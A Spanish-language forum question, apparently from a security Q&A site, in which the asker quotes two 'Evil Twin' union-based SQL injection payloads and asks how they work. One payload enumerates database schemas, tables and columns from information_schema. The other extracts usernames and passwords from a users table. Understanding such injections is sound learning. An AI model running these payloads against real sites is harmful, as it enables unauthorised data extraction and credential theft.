He estado leyendo acerca de la inyección de SQL y me golpearon en la inyección de Evil Twin SQL aquí . Hay dos consultas mencionadas en el artículo de la siguiente manera.
-1' union select 1,2,3,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)#
y
-1' union all select (select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
Entiendo que la primera consulta recuperará todas las tablas y las columnas correspondientes y la segunda consulta recuperará los datos de una columna particular de una tabla. Pero el artículo realmente no explica cómo funciona la consulta.
La mayor parte de mi búsqueda en Google fue directamente al craqueo del wifi Evil Twin :(